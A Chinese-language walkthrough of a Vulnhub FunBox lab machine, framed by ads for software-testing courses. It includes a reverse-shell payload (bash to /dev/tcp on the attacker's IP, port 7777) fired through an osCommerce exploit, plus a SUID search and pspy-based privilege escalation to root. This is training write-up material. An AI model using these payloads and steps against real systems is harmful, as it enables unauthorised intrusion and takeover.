既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
kali里使用netdiscover
发现主机
渗透机:kali IP :172.16.5.117 靶机IP :172.16.5.108
ping
的通 环境搭建成功!
通过nmap
扫描发现开启了22,25
和80,110,143
端口 访问80
端口 简单dirb
扫描一下
②:漏洞利用:
查看相关漏洞:searchsploit osCommerce 2.3.4.1
发现了 44374.py
进行漏洞利用。
'shell\_exec("bash -c \'bash -i >& /dev/tcp/172.16.5.17/7777 0>&1\'");'
这里的话就回弹成功了 但是权限比较低!!!
③:pspy64提权:
使用命令:find / -perm -4000 -exec ls -al {} \; 2>/dev/null
发现没有可以利用的sudo
提权
需要上传一个pspy64s
scp
发现有这个命令(kali
要开启ssh
服务 和配置文件设置好 不然不行!!) 下载成功!!
scp root@172.16.5.17:/var/www/html/pspy64 .
给个权限: chmod 777 pspy64
然后运行 ./pspy64
发现了一个 UID=1000 cron.sh
进行查看
Base64解码:http://www.jsons.cn/base64
得到了root 账号的密码 直接登入即可!!!
④:获取flag:
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
FunBox
系列第十个靶机了 这个靶机比较简单
1.信息收集 获取ip地址 和端口信息
2. searchsploit
使用 然后进行漏洞的利用
3. pspy64
提权
**这是这个系列第十个靶机啦 比较简单 希望对刚入门得小白有帮助! 后续会把这个系列更新完!🙂
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
)**
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!